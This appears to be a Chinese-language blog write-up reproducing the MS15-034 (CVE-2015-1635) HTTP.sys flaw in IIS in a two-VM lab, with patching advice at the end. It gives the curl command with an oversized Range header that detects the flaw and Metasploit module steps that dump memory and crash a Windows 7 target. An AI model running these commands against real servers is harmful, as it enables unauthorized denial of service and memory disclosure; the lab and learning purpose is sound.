MS15-034遠程執行代碼漏洞CVE-2015-1635IIS中的HTTP.sys 中的漏洞

1、漏洞說明
遠程執行代碼漏洞存在於 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。 成功利用此漏洞的攻擊者可以在系統帳戶的上下文中執行任意代碼。

若要利用此漏洞,攻擊者必須將經特殊設計的 HTTP 請求發送到受影響的系統。 通過修改 Windows HTTP 堆棧處理請求的方式,ms15-034此更新可以修復此漏洞。更多詳情https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034

2、漏洞復現
環境準備:
1)在虛擬機中準備兩臺虛擬機,一臺爲攻擊者,另外一臺爲受害者。這裏攻擊者選擇的是kali虛擬機,受害者選擇的是window7操作系統,注意:這裏的是64位的操作系統,32位的操作系統經過我自己測試無法測試成功。並確保兩臺機子在同一個局域網,window7關閉防火牆。
Wind7靶機ip 192.168.17.197
Kali攻擊ip地址 192.168.17.195
2)在window7操作系統上搭建IIS服務,詳情參考https://jingyan.baidu.com/article/2fb0ba40916a1c00f2ec5ff7.html
開始復現:
第一步:打開kali,輸入命令curl http://192.168.17.197-H “192.168.17.197” -H “Range:bytes=0-18446744073709551615”,向window7http發送數據包當出現Requested Range Not Satisfiable則存在該漏洞,如圖:
在這裏插入圖片描述
第二步:啓動msf命令:msfconsole
然後search ms15-034
在這裏插入圖片描述
使用use auxiliary/scanner/http/ms15_034_http_sys_memory_dump模塊,set RHOSTS 192.168.17.197如圖
在這裏插入圖片描述
讀取信息內存
在這裏插入圖片描述
進行攻擊
在這裏插入圖片描述
window7藍屏重新啓動
在這裏插入圖片描述
在這裏插入圖片描述

修復意見:打上ms15-034補丁。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章